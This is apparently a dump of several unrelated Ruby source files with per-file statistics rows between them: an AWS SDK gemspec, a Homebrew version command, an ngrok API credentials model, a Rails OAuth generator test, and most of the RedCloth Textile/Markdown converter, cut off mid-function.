| 17.734694 | 62 | 0.757192 |
086b1cc0ea2b04fa02f7614bcea09ec14ddf00e9 | 1,264 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-lexruntimev2'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Lex Runtime V2'
spec.description = 'Official AWS Ruby gem for Amazon Lex Runtime V2 (Lex Runtime V2). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'https://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['LICENSE.txt', 'CHANGELOG.md', 'VERSION', 'lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-lexruntimev2',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/version-3/gems/aws-sdk-lexruntimev2/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3', '>= 3.112.0')
spec.add_dependency('aws-sigv4', '~> 1.1')
end
| 39.5 | 132 | 0.668513 |
ff038f70960c0ece92fe64a5cb3d8adcee5602f8 | 720 | # typed: false
# frozen_string_literal: true
require "cli/parser"
module Homebrew
extend T::Sig
module_function
sig { returns(CLI::Parser) }
def __version_args
Homebrew::CLI::Parser.new do
usage_banner <<~EOS
`--version`
Print the version numbers of Homebrew, Homebrew/homebrew-core and Homebrew/homebrew-cask
(if tapped) to standard output.
EOS
max_named 0
end
end
def __version
__version_args.parse
puts "Homebrew #{HOMEBREW_VERSION}"
puts "#{CoreTap.instance.full_name} #{CoreTap.instance.version_string}"
puts "#{Tap.default_cask_tap.full_name} #{Tap.default_cask_tap.version_string}" if Tap.default_cask_tap.installed?
end
end
| 21.818182 | 118 | 0.701389 |
7ad16d0f62eafe187f6ddf3b059326ef3b8ad639 | 587 | # frozen_string_literal: true
module NgrokAPI
module Models
class AWSCredentials
attr_reader :client,
:attrs,
:aws_access_key_id,
:aws_secret_access_key
def initialize(client: nil, attrs: {})
@client = client
@attrs = attrs
@aws_access_key_id = @attrs['aws_access_key_id']
@aws_secret_access_key = @attrs['aws_secret_access_key']
end
def ==(other)
@attrs == other.attrs
end
def to_s
@attrs.to_s
end
def to_h
@attrs.to_h
end
end
end
end
| 18.34375 | 64 | 0.58092 |
115e2c2972ecf908dc36210f426a1a5a10228663 | 163 | # frozen_string_literal: true
# Faraday namespace.
module Faraday
# Exception used to control the Retry middleware.
class RetriableResponse < Error
end
end
| 18.111111 | 51 | 0.779141 |
e21cd6d062b82cf235b8c1320042e386a76e1ff6 | 1,332 | # frozen_string_literal: true
require "test_helper"
require "generators/boring/devise/install/install_generator"
require "generators/boring/oauth/google/install/install_generator"
class OauthGoogleInstallGeneratorTest < Rails::Generators::TestCase
tests Boring::Oauth::Google::InstallGenerator
setup :build_app
teardown :teardown_app
include GeneratorHelper
include ActiveSupport::Testing::Isolation
def destination_root
app_path
end
def test_should_install_google_oauth
Dir.chdir(app_path) do
quietly { Rails::Generators.invoke("boring:devise:install") }
quietly { run_generator }
assert_gem "omniauth-google-oauth2"
assert_migration "db/migrate/add_omniauth_to_users.rb"
assert_file "config/initializers/devise.rb" do |content|
assert_match('config.omniauth :google_oauth2', content)
end
assert_file "app/controllers/users/omniauth_callbacks_controller.rb"
assert_file "app/models/user.rb" do |content|
assert_match('devise :omniauthable, omniauth_providers: %i[google_oauth2]', content)
assert_match('def self.from_omniauth(auth)', content)
end
end
end
def test_should_raise_devise_configuration_missing_error
Dir.chdir(app_path) do
assert_raises do
run_generator
end
end
end
end
| 28.340426 | 92 | 0.747748 |
d5c14df242b7bfb1273b9bf31dba916cca77f002 | 466 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = '1.0'
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
# Rails.application.config.assets.precompile += %w( search.js )
Rails.application.config.assets.precompile += %w[polyfills.js helena_administration.css]
| 46.6 | 93 | 0.776824 |
4ac9ef6695ddfc91b0100495a2ae7d11dd069678 | 35,941 | # vim:ts=4:sw=4:
# = RedCloth - Textile and Markdown Hybrid for Ruby
#
# Homepage:: http://whytheluckystiff.net/ruby/redcloth/
# Author:: why the lucky stiff (http://whytheluckystiff.net/)
# Copyright:: (cc) 2004 why the lucky stiff (and his puppet organizations.)
# License:: BSD
#
# (see http://hobix.com/textile/ for a Textile Reference.)
#
# Based on (and also inspired by) both:
#
# PyTextile: http://diveintomark.org/projects/textile/textile.py.txt
# Textism for PHP: http://www.textism.com/tools/textile/
#
#
# = RedCloth
#
# RedCloth is a Ruby library for converting Textile and/or Markdown
# into HTML. You can use either format, intermingled or separately.
# You can also extend RedCloth to honor your own custom text stylings.
#
# RedCloth users are encouraged to use Textile if they are generating
# HTML and to use Markdown if others will be viewing the plain text.
#
# == What is Textile?
#
# Textile is a simple formatting style for text
# documents, loosely based on some HTML conventions.
#
# == Sample Textile Text
#
# h2. This is a title
#
# h3. This is a subhead
#
# This is a bit of paragraph.
#
# bq. This is a blockquote.
#
# = Writing Textile
#
# A Textile document consists of paragraphs. Paragraphs
# can be specially formatted by adding a small instruction
# to the beginning of the paragraph.
#
# h[n]. Header of size [n].
# bq. Blockquote.
# # Numeric list.
# * Bulleted list.
#
# == Quick Phrase Modifiers
#
# Quick phrase modifiers are also included, to allow formatting
# of small portions of text within a paragraph.
#
# \_emphasis\_
# \_\_italicized\_\_
# \*strong\*
# \*\*bold\*\*
# ??citation??
# -deleted text-
# +inserted text+
# ^superscript^
# ~subscript~
# @code@
# %(classname)span%
#
# ==notextile== (leave text alone)
#
# == Links
#
# To make a hypertext link, put the link text in "quotation
# marks" followed immediately by a colon and the URL of the link.
#
# Optional: text in (parentheses) following the link text,
# but before the closing quotation mark, will become a Title
# attribute for the link, visible as a tool tip when a cursor is above it.
#
# Example:
#
# "This is a link (This is a title) ":http://www.textism.com
#
# Will become:
#
# <a href="http://www.textism.com" title="This is a title">This is a link</a>
#
# == Images
#
# To insert an image, put the URL for the image inside exclamation marks.
#
# Optional: text that immediately follows the URL in (parentheses) will
# be used as the Alt text for the image. Images on the web should always
# have descriptive Alt text for the benefit of readers using non-graphical
# browsers.
#
# Optional: place a colon followed by a URL immediately after the
# closing ! to make the image into a link.
#
# Example:
#
# !http://www.textism.com/common/textist.gif(Textist)!
#
# Will become:
#
# <img src="http://www.textism.com/common/textist.gif" alt="Textist" />
#
# With a link:
#
# !/common/textist.gif(Textist)!:http://textism.com
#
# Will become:
#
# <a href="http://textism.com"><img src="/common/textist.gif" alt="Textist" /></a>
#
# == Defining Acronyms
#
# HTML allows authors to define acronyms via the <acronym> tag. The definition appears as a
# tool tip when a cursor hovers over the acronym. A crucial aid to clear writing,
# this should be used at least once for each acronym in documents where they appear.
#
# To quickly define an acronym in Textile, place the full text in (parentheses)
# immediately following the acronym.
#
# Example:
#
# ACLU(American Civil Liberties Union)
#
# Will become:
#
# <acronym title="American Civil Liberties Union">ACLU</acronym>
#
# == Adding Tables
#
# In Textile, simple tables can be added by separating each column by
# a pipe.
#
# |a|simple|table|row|
# |And|Another|table|row|
#
# Attributes are defined by style definitions in parentheses.
#
# table(border:1px solid black).
# (background:#ddd;color:red). |{}| | | |
#
# == Using RedCloth
#
# RedCloth is simply an extension of the String class, which can handle
# Textile formatting. Use it like a String and output HTML with its
# RedCloth#to_html method.
#
# doc = RedCloth.new "
#
# h2. Test document
#
# Just a simple test."
#
# puts doc.to_html
#
# By default, RedCloth uses both Textile and Markdown formatting, with
# Textile formatting taking precedence. If you want to turn off Markdown
# formatting, to boost speed and limit the processor:
#
# class RedCloth::Textile.new( str )
class RedCloth < String
VERSION = '3.0.4'
DEFAULT_RULES = [:textile, :markdown]
#
# Two accessors for setting security restrictions.
#
# This is a nice thing if you're using RedCloth for
# formatting in public places (e.g. Wikis) where you
# don't want users to abuse HTML for bad things.
#
# If +:filter_html+ is set, HTML which wasn't
# created by the Textile processor will be escaped.
#
# If +:filter_styles+ is set, it will also disable
# the style markup specifier. ('{color: red}')
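#
# For example (a sketch; +page_content+ is just a placeholder string):
#
#   r = RedCloth.new( page_content, [:filter_html, :filter_styles] )
#   r.to_html
#   # hand-written HTML and {style} attributes are filtered as described above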
#
attr_accessor :filter_html, :filter_styles
#
# Accessor for toggling hard breaks.
#
# If +:hard_breaks+ is set, single newlines will
# be converted to HTML break tags. This is the
# default behavior for traditional RedCloth.
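#
# For example (a sketch):
#
#   r = RedCloth.new( "Roses are red,\nviolets are blue.", [:hard_breaks] )
#   r.to_html
#   # the single newline inside the paragraph is rendered as a <br /> tag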
#
attr_accessor :hard_breaks
# Accessor for toggling lite mode.
#
# In lite mode, block-level rules are ignored. This means
# that tables, paragraphs, lists, and such aren't available.
# Only the inline markup for bold, italics, entities and so on.
#
# r = RedCloth.new( "And then? She *fell*!", [:lite_mode] )
# r.to_html
# #=> "And then? She <strong>fell</strong>!"
#
attr_accessor :lite_mode
#
# Accessor for toggling span caps.
#
# Textile places `span' tags around capitalized
# words by default, but this wreaks havoc on Wikis.
# If +:no_span_caps+ is set, this will be
# suppressed.
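#
# For example (a sketch):
#
#   RedCloth.new( "NASA announced it", [:no_span_caps] ).to_html
#   # leaves NASA as plain text instead of wrapping it in <span class="caps">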
#
attr_accessor :no_span_caps
#
# Establishes the markup precedence. Available rules include:
#
# == Textile Rules
#
# The following textile rules can be set individually. Or add the complete
# set of rules with the single :textile rule, which supplies the rule set in
# the following precedence:
#
# refs_textile:: Textile references (i.e. [hobix]http://hobix.com/)
# block_textile_table:: Textile table block structures
# block_textile_lists:: Textile list structures
# block_textile_prefix:: Textile blocks with prefixes (i.e. bq., h2., etc.)
# inline_textile_image:: Textile inline images
# inline_textile_link:: Textile inline links
# inline_textile_span:: Textile inline spans
# glyphs_textile:: Textile entities (such as em-dashes and smart quotes)
#
# == Markdown
#
# refs_markdown:: Markdown references (for example: [hobix]: http://hobix.com/)
# block_markdown_setext:: Markdown setext headers
# block_markdown_atx:: Markdown atx headers
# block_markdown_rule:: Markdown horizontal rules
# block_markdown_bq:: Markdown blockquotes
# block_markdown_lists:: Markdown lists
# inline_markdown_link:: Markdown links
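#
# Rules are normally supplied when calling #to_html. For example, to run
# only the Markdown rule set (a sketch):
#
#   RedCloth.new( "A First Level Header\n====================" ).to_html( :markdown )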
attr_accessor :rules
# Returns a new RedCloth object, based on _string_ and
# enforcing all the included _restrictions_.
#
# r = RedCloth.new( "h1. A <b>bold</b> man", [:filter_html] )
# r.to_html
# #=>"<h1>A <b>bold</b> man</h1>"
#
def initialize( string, restrictions = [] )
restrictions.each { |r| method( "#{ r }=" ).call( true ) }
super( string )
end
#
# Generates HTML from the Textile contents.
#
# r = RedCloth.new( "And then? She *fell*!" )
# r.to_html( true )
# #=>"And then? She <strong>fell</strong>!"
#
def to_html( *rules )
rules = DEFAULT_RULES if rules.empty?
# make our working copy
text = self.dup
@urlrefs = {}
@shelf = []
textile_rules = [:refs_textile, :block_textile_table, :block_textile_lists,
:block_textile_prefix, :inline_textile_image, :inline_textile_link,
:inline_textile_code, :inline_textile_span, :glyphs_textile]
markdown_rules = [:refs_markdown, :block_markdown_setext, :block_markdown_atx, :block_markdown_rule,
:block_markdown_bq, :block_markdown_lists,
:inline_markdown_reflink, :inline_markdown_link]
@rules = rules.collect do |rule|
case rule
when :markdown
markdown_rules
when :textile
textile_rules
else
rule
end
end.flatten
# standard clean up
incoming_entities text
clean_white_space text
# start processor
@pre_list = []
rip_offtags text
no_textile text
hard_break text
unless @lite_mode
refs text
blocks text
end
inline text
smooth_offtags text
retrieve text
text.gsub!( /<\/?notextile>/, '' )
text.gsub!( /x%x%/, '&#38;' )
clean_html text if filter_html
text.strip!
text
end
#######
private
#######
#
# Mapping of 8-bit ASCII codes to HTML numerical entity equivalents.
# (from PyTextile)
#
TEXTILE_TAGS =
[[128, 8364], [129, 0], [130, 8218], [131, 402], [132, 8222], [133, 8230],
[134, 8224], [135, 8225], [136, 710], [137, 8240], [138, 352], [139, 8249],
[140, 338], [141, 0], [142, 0], [143, 0], [144, 0], [145, 8216], [146, 8217],
[147, 8220], [148, 8221], [149, 8226], [150, 8211], [151, 8212], [152, 732],
[153, 8482], [154, 353], [155, 8250], [156, 339], [157, 0], [158, 0], [159, 376]].
collect! do |a, b|
[a.chr, ( b.zero? and "" or "&##{ b };" )]
end
#
# Regular expressions to convert to HTML.
#
A_HLGN = /(?:(?:<>|<|>|\=|[()]+)+)/
A_VLGN = /[\-^~]/
C_CLAS = '(?:\([^)]+\))'
C_LNGE = '(?:\[[^\]]+\])'
C_STYL = '(?:\{[^}]+\})'
S_CSPN = '(?:\\\\\d+)'
S_RSPN = '(?:/\d+)'
A = "(?:#{A_HLGN}?#{A_VLGN}?|#{A_VLGN}?#{A_HLGN}?)"
S = "(?:#{S_CSPN}?#{S_RSPN}|#{S_RSPN}?#{S_CSPN}?)"
C = "(?:#{C_CLAS}?#{C_STYL}?#{C_LNGE}?|#{C_STYL}?#{C_LNGE}?#{C_CLAS}?|#{C_LNGE}?#{C_STYL}?#{C_CLAS}?)"
# PUNCT = Regexp::quote( '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' )
PUNCT = Regexp::quote( '!"#$%&\'*+,-./:;=?@\\^_`|~' )
PUNCT_NOQ = Regexp::quote( '!"#$&\',./:;=?@\\`|' )
PUNCT_Q = Regexp::quote( '*-_+^~%' )
HYPERLINK = '(\S+?)([^\w\s/;=\?]*?)(?=\s|<|$)'
# Text markup tags, don't conflict with block tags
SIMPLE_HTML_TAGS = [
'tt', 'b', 'i', 'big', 'small', 'em', 'strong', 'dfn', 'code',
'samp', 'kbd', 'var', 'cite', 'abbr', 'acronym', 'a', 'img', 'br',
'br', 'map', 'q', 'sub', 'sup', 'span', 'bdo'
]
QTAGS = [
['**', 'b'],
['*', 'strong'],
['??', 'cite', :limit],
['-', 'del', :limit],
['__', 'i'],
['_', 'em', :limit],
['%', 'span', :limit],
['+', 'ins', :limit],
['^', 'sup'],
['~', 'sub']
]
QTAGS.collect! do |rc, ht, rtype|
rcq = Regexp::quote rc
re =
case rtype
when :limit
/(\W)
(#{rcq})
(#{C})
(?::(\S+?))?
(\S.*?\S|\S)
#{rcq}
(?=\W)/x
else
/(#{rcq})
(#{C})
(?::(\S+))?
(\S.*?\S|\S)
#{rcq}/xm
end
[rc, ht, re, rtype]
end
# Elements to handle
GLYPHS = [
# [ /([^\s\[{(>])?\'([dmst]\b|ll\b|ve\b|\s|:|$)/, '\1&#8217;\2' ], # single closing
[ /([^\s\[{(>#{PUNCT_Q}][#{PUNCT_Q}]*)\'/, '\1&#8217;' ], # single closing
[ /\'(?=[#{PUNCT_Q}]*(s\b|[\s#{PUNCT_NOQ}]))/, '&#8217;' ], # single closing
[ /\'/, '&#8216;' ], # single opening
[ /</, '&lt;' ], # less-than
[ />/, '&gt;' ], # greater-than
# [ /([^\s\[{(])?"(\s|:|$)/, '\1&#8221;\2' ], # double closing
[ /([^\s\[{(>#{PUNCT_Q}][#{PUNCT_Q}]*)"/, '\1&#8221;' ], # double closing
[ /"(?=[#{PUNCT_Q}]*[\s#{PUNCT_NOQ}])/, '&#8221;' ], # double closing
[ /"/, '&#8220;' ], # double opening
[ /\b( )?\.{3}/, '\1&#8230;' ], # ellipsis
[ /\b([A-Z][A-Z0-9]{2,})\b(?:[(]([^)]*)[)])/, '<acronym title="\2">\1</acronym>' ], # 3+ uppercase acronym
[ /(^|[^"][>\s])([A-Z][A-Z0-9 ]+[A-Z0-9])([^<A-Za-z0-9]|$)/, '\1<span class="caps">\2</span>\3', :no_span_caps ], # 3+ uppercase caps
[ /(\.\s)?\s?--\s?/, '\1&#8212;' ], # em dash
[ /\s->\s/, ' &#8594; ' ], # right arrow
[ /\s-\s/, ' &#8211; ' ], # en dash
[ /(\d+) ?x ?(\d+)/, '\1&#215;\2' ], # dimension sign
[ /\b ?[(\[]TM[\])]/i, '&#8482;' ], # trademark
[ /\b ?[(\[]R[\])]/i, '&#174;' ], # registered
[ /\b ?[(\[]C[\])]/i, '&#169;' ] # copyright
]
H_ALGN_VALS = {
'<' => 'left',
'=' => 'center',
'>' => 'right',
'<>' => 'justify'
}
V_ALGN_VALS = {
'^' => 'top',
'-' => 'middle',
'~' => 'bottom'
}
#
# Flexible HTML escaping
#
def htmlesc( str, mode )
str.gsub!( '&', '&' )
str.gsub!( '"', '"' ) if mode != :NoQuotes
str.gsub!( "'", ''' ) if mode == :Quotes
str.gsub!( '<', '<')
str.gsub!( '>', '>')
end
# Search and replace for Textile glyphs (quotes, dashes, other symbols)
def pgl( text )
GLYPHS.each do |re, resub, tog|
next if tog and method( tog ).call
text.gsub! re, resub
end
end
# Parses Textile attribute lists and builds an HTML attribute string
def pba( text_in, element = "" )
return '' unless text_in
style = []
text = text_in.dup
if element == 'td'
colspan = $1 if text =~ /\\(\d+)/
rowspan = $1 if text =~ /\/(\d+)/
style << "vertical-align:#{ v_align( $& ) };" if text =~ A_VLGN
end
style << "#{ $1 };" if not filter_styles and
text.sub!( /\{([^}]*)\}/, '' )
lang = $1 if
text.sub!( /\[([^)]+?)\]/, '' )
cls = $1 if
text.sub!( /\(([^()]+?)\)/, '' )
style << "padding-left:#{ $1.length }em;" if
text.sub!( /([(]+)/, '' )
style << "padding-right:#{ $1.length }em;" if text.sub!( /([)]+)/, '' )
style << "text-align:#{ h_align( $& ) };" if text =~ A_HLGN
cls, id = $1, $2 if cls =~ /^(.*?)#(.*)$/
atts = ''
atts << " style=\"#{ style.join }\"" unless style.empty?
atts << " class=\"#{ cls }\"" unless cls.to_s.empty?
atts << " lang=\"#{ lang }\"" if lang
atts << " id=\"#{ id }\"" if id
atts << " colspan=\"#{ colspan }\"" if colspan
atts << " rowspan=\"#{ rowspan }\"" if rowspan
atts
end
TABLE_RE = /^(?:table(_?#{S}#{A}#{C})\. ?\n)?^(#{A}#{C}\.? ?\|.*?\|)(\n\n|\Z)/m
# Parses a Textile table block, building HTML from the result.
def block_textile_table( text )
text.gsub!( TABLE_RE ) do |matches|
tatts, fullrow = $~[1..2]
tatts = pba( tatts, 'table' )
tatts = shelve( tatts ) if tatts
rows = []
fullrow.
split( /\|$/m ).
delete_if { |x| x.empty? }.
each do |row|
ratts, row = pba( $1, 'tr' ), $2 if row =~ /^(#{A}#{C}\. )(.*)/m
cells = []
row.split( '|' ).each do |cell|
ctyp = 'd'
ctyp = 'h' if cell =~ /^_/
catts = ''
catts, cell = pba( $1, 'td' ), $2 if cell =~ /^(_?#{S}#{A}#{C}\. ?)(.*)/
unless cell.strip.empty?
catts = shelve( catts ) if catts
cells << "\t\t\t<t#{ ctyp }#{ catts }>#{ cell }</t#{ ctyp }>"
end
end
ratts = shelve( ratts ) if ratts
rows << "\t\t<tr#{ ratts }>\n#{ cells.join( "\n" ) }\n\t\t</tr>"
end
"\t<table#{ tatts }>\n#{ rows.join( "\n" ) }\n\t</table>\n\n"
end
end
LISTS_RE = /^([#*]+?#{C} .*?)$(?![^#*])/m
LISTS_CONTENT_RE = /^([#*]+)(#{A}#{C}) (.*)$/m
# Parses Textile lists and generates HTML
def block_textile_lists( text )
text.gsub!( LISTS_RE ) do |match|
lines = match.split( /\n/ )
last_line = -1
depth = []
lines.each_with_index do |line, line_id|
if line =~ LISTS_CONTENT_RE
tl,atts,content = $~[1..3]
if depth.last
if depth.last.length > tl.length
(depth.length - 1).downto(0) do |i|
break if depth[i].length == tl.length
lines[line_id - 1] << "</li>\n\t</#{ lT( depth[i] ) }l>\n\t"
depth.pop
end
end
if depth.last and depth.last.length == tl.length
lines[line_id - 1] << '</li>'
end
end
unless depth.last == tl
depth << tl
atts = pba( atts )
atts = shelve( atts ) if atts
lines[line_id] = "\t<#{ lT(tl) }l#{ atts }>\n\t<li>#{ content }"
else
lines[line_id] = "\t\t<li>#{ content }"
end
last_line = line_id
else
last_line = line_id
end
if line_id - last_line > 1 or line_id == lines.length - 1
depth.delete_if do |v|
lines[last_line] << "</li>\n\t</#{ lT( v ) }l>"
end
end
end
lines.join( "\n" )
end
end
CODE_RE = /(\W)
@
(?:\|(\w+?)\|)?
(.+?)
@
(?=\W)/x
def inline_textile_code( text )
text.gsub!( CODE_RE ) do |m|
before,lang,code,after = $~[1..4]
lang = " lang=\"#{ lang }\"" if lang
rip_offtags( "#{ before }<code#{ lang }>#{ code }</code>#{ after }" )
end
end
def lT( text )
text =~ /\#$/ ? 'o' : 'u'
end
def hard_break( text )
text.gsub!( /(.)\n(?!\Z| *([#*=]+(\s|$)|[{|]))/, "\\1<br />" ) if hard_breaks
end
BLOCKS_GROUP_RE = /\n{2,}(?! )/m
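    # Split the text into chunks on blank lines, run each chunk through the
    # block_* rules, and wrap anything left untouched in <p> (or <pre><code>
    # when it is being treated as nested code).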
def blocks( text, deep_code = false )
text.replace( text.split( BLOCKS_GROUP_RE ).collect do |blk|
plain = blk !~ /\A[#*> ]/
# skip blocks that are complex HTML
if blk =~ /^<\/?(\w+).*>/ and not SIMPLE_HTML_TAGS.include? $1
blk
else
# search for indentation levels
blk.strip!
if blk.empty?
blk
else
code_blk = nil
blk.gsub!( /((?:\n(?:\n^ +[^\n]*)+)+)/m ) do |iblk|
flush_left iblk
blocks iblk, plain
iblk.gsub( /^(\S)/, "\t\\1" )
if plain
code_blk = iblk; ""
else
iblk
end
end
block_applied = 0
@rules.each do |rule_name|
block_applied += 1 if ( rule_name.to_s.match /^block_/ and method( rule_name ).call( blk ) )
end
if block_applied.zero?
if deep_code
blk = "\t<pre><code>#{ blk }</code></pre>"
else
blk = "\t<p>#{ blk }</p>"
end
end
# hard_break blk
blk + "\n#{ code_blk }"
end
end
end.join( "\n\n" ) )
end
def textile_bq( tag, atts, cite, content )
cite, cite_title = check_refs( cite )
cite = " cite=\"#{ cite }\"" if cite
atts = shelve( atts ) if atts
"\t<blockquote#{ cite }>\n\t\t<p#{ atts }>#{ content }</p>\n\t</blockquote>"
end
def textile_p( tag, atts, cite, content )
atts = shelve( atts ) if atts
"\t<#{ tag }#{ atts }>#{ content }</#{ tag }>"
end
alias textile_h1 textile_p
alias textile_h2 textile_p
alias textile_h3 textile_p
alias textile_h4 textile_p
alias textile_h5 textile_p
alias textile_h6 textile_p
def textile_fn_( tag, num, atts, cite, content )
atts << " id=\"fn#{ num }\""
atts << " class=\"footnote\""
content = "<sup>#{ num }</sup> #{ content }"
atts = shelve( atts ) if atts
"\t<p#{ atts }>#{ content }</p>"
end
BLOCK_RE = /^(([a-z]+)(\d*))(#{A}#{C})\.(?::(\S+))? (.*)$/m
def block_textile_prefix( text )
if text =~ BLOCK_RE
tag,tagpre,num,atts,cite,content = $~[1..6]
atts = pba( atts )
# pass to prefix handler
if respond_to? "textile_#{ tag }", true
text.gsub!( $&, method( "textile_#{ tag }" ).call( tag, atts, cite, content ) )
elsif respond_to? "textile_#{ tagpre }_", true
text.gsub!( $&, method( "textile_#{ tagpre }_" ).call( tagpre, num, atts, cite, content ) )
end
end
end
SETEXT_RE = /\A(.+?)\n([=-])[=-]* *$/m
def block_markdown_setext( text )
if text =~ SETEXT_RE
tag = if $2 == "="; "h2"; else; "h3"; end
blk, cont = "<#{ tag }>#{ $1 }</#{ tag }>", $'
blocks cont
text.replace( blk + cont )
end
end
ATX_RE = /\A(\#{1,6}) # $1 = string of #'s
[ ]*
(.+?) # $2 = Header text
[ ]*
\#* # optional closing #'s (not counted)
$/x
def block_markdown_atx( text )
if text =~ ATX_RE
tag = "h#{ $1.length }"
blk, cont = "<#{ tag }>#{ $2 }</#{ tag }>\n\n", $'
blocks cont
text.replace( blk + cont )
end
end
MARKDOWN_BQ_RE = /\A(^ *> ?.+$(.+\n)*\n*)+/m
def block_markdown_bq( text )
text.gsub!( MARKDOWN_BQ_RE ) do |blk|
blk.gsub!( /^ *> ?/, '' )
flush_left blk
blocks blk
blk.gsub!( /^(\S)/, "\t\\1" )
"<blockquote>\n#{ blk }\n</blockquote>\n\n"
end
end
MARKDOWN_RULE_RE = /^(#{
['*', '-', '_'].collect { |ch| '( ?' + Regexp::quote( ch ) + ' ?){3,}' }.join( '|' )
})$/
def block_markdown_rule( text )
text.gsub!( MARKDOWN_RULE_RE ) do |blk|
"<hr />"
end
end
# XXX TODO XXX
def block_markdown_lists( text )
end
def inline_textile_span( text )
QTAGS.each do |qtag_rc, ht, qtag_re, rtype|
text.gsub!( qtag_re ) do |m|
case rtype
when :limit
sta,qtag,atts,cite,content = $~[1..5]
else
qtag,atts,cite,content = $~[1..4]
sta = ''
end
atts = pba( atts )
atts << " cite=\"#{ cite }\"" if cite
atts = shelve( atts ) if atts
"#{ sta }<#{ ht }#{ atts }>#{ content }</#{ ht }>"
end
end
end
LINK_RE = /
([\s\[{(]|[#{PUNCT}])? # $pre
" # start
(#{C}) # $atts
([^"]+?) # $text
\s?
(?:\(([^)]+?)\)(?="))? # $title
":
(\S+?) # $url
(\/)? # $slash
([^\w\/;]*?) # $post
(?=<|\s|$)
/x
def inline_textile_link( text )
text.gsub!( LINK_RE ) do |m|
pre,atts,text,title,url,slash,post = $~[1..7]
url, url_title = check_refs( url )
title ||= url_title
atts = pba( atts )
atts = " href=\"#{ url }#{ slash }\"#{ atts }"
atts << " class=\"external\""
atts << " title=\"#{ title }\"" if title
atts = shelve( atts ) if atts
"#{ pre }<a#{ atts }>#{ text }</a>#{ post }"
end
end
MARKDOWN_REFLINK_RE = /
\[([^\[\]]+)\] # $text
[ ]? # opt. space
(?:\n[ ]*)? # one optional newline followed by spaces
\[(.*?)\] # $id
/x
def inline_markdown_reflink( text )
text.gsub!( MARKDOWN_REFLINK_RE ) do |m|
text, id = $~[1..2]
if id.empty?
url, title = check_refs( text )
else
url, title = check_refs( id )
end
atts = " href=\"#{ url }\""
atts << " title=\"#{ title }\"" if title
atts = shelve( atts )
"<a#{ atts }>#{ text }</a>"
end
end
MARKDOWN_LINK_RE = /
\[([^\[\]]+)\] # $text
\( # open paren
[ \t]* # opt space
<?(.+?)>? # $href
[ \t]* # opt space
(?: # whole title
(['"]) # $quote
(.*?) # $title
\3 # matching quote
)? # title is optional
\)
/x
def inline_markdown_link( text )
text.gsub!( MARKDOWN_LINK_RE ) do |m|
text, url, quote, title = $~[1..4]
atts = " href=\"#{ url }\""
atts << " title=\"#{ title }\"" if title
atts = shelve( atts )
"<a#{ atts }>#{ text }</a>"
end
end
TEXTILE_REFS_RE = /(^ *)\[([^\n]+?)\](#{HYPERLINK})(?=\s|$)/
MARKDOWN_REFS_RE = /(^ *)\[([^\n]+?)\]:\s+<?(#{HYPERLINK})>?(?:\s+"((?:[^"]|\\")+)")?(?=\s|$)/m
def refs( text )
@rules.each do |rule_name|
method( rule_name ).call( text ) if rule_name.to_s.match /^refs_/
end
end
def refs_textile( text )
text.gsub!( TEXTILE_REFS_RE ) do |m|
flag, url = $~[2..3]
@urlrefs[flag.downcase] = [url, nil]
nil
end
end
def refs_markdown( text )
text.gsub!( MARKDOWN_REFS_RE ) do |m|
flag, url = $~[2..3]
title = $~[6]
@urlrefs[flag.downcase] = [url, title]
nil
end
end
def check_refs( text )
ret = @urlrefs[text.downcase] if text
ret || [text, nil]
end
IMAGE_RE = /
(<p>|.|^) # start of line?
\! # opening
(\<|\=|\>)? # optional alignment atts
(#{C}) # optional style,class atts
(?:\. )? # optional dot-space
([^\s(!]+?) # presume this is the src
\s? # optional space
(?:\(((?:[^\(\)]|\([^\)]+\))+?)\))? # optional title
\! # closing
(?::#{ HYPERLINK })? # optional href
/x
def inline_textile_image( text )
text.gsub!( IMAGE_RE ) do |m|
stln,algn,atts,url,title,href,href_a1,href_a2 = $~[1..8]
atts = pba( atts )
atts = " src=\"#{ url }\"#{ atts }"
atts << " title=\"#{ title }\"" if title
atts << " alt=\"#{ title }\""
# size = @getimagesize($url);
# if($size) $atts.= " $size[3]";
href, alt_title = check_refs( href ) if href
url, url_title = check_refs( url )
out = ''
out << "<a#{ shelve( " href=\"#{ href }\"" ) }>" if href
out << "<img#{ shelve( atts ) } />"
out << "</a>#{ href_a1 }#{ href_a2 }" if href
if algn
algn = h_align( algn )
if stln == "<p>"
out = "<p style=\"float:#{ algn }\">#{ out }"
else
out = "#{ stln }<div style=\"float:#{ algn }\">#{ out }</div>"
end
else
out = stln + out
end
out
end
end
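    # Park a finished fragment on the shelf and return a placeholder token;
    # retrieve() substitutes the real text back in at the end of processing.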
def shelve( val )
@shelf << val
" :redsh##{ @shelf.length }:"
end
def retrieve( text )
@shelf.each_with_index do |r, i|
text.gsub!( " :redsh##{ i + 1 }:", r )
end
end
def incoming_entities( text )
## turn any incoming ampersands into a dummy character for now.
## This uses a negative lookahead for alphanumerics followed by a semicolon,
## implying an incoming html entity, to be skipped
text.gsub!( /&(?![#a-z0-9]+;)/i, "x%x%" )
end
def no_textile( text )
text.gsub!( /(^|\s)==([^=]+.*?)==(\s|$)?/,
'\1<notextile>\2</notextile>\3' )
text.gsub!( /^ *==([^=]+.*?)==/m,
'\1<notextile>\2</notextile>\3' )
end
def clean_white_space( text )
# normalize line breaks
text.gsub!( /\r\n/, "\n" )
text.gsub!( /\r/, "\n" )
text.gsub!( /\t/, ' ' )
text.gsub!( /^ +$/, '' )
text.gsub!( /\n{3,}/, "\n\n" )
text.gsub!( /"$/, "\" " )
# if entire document is indented, flush
# to the left side
flush_left text
end
def flush_left( text )
indt = 0
if text =~ /^ /
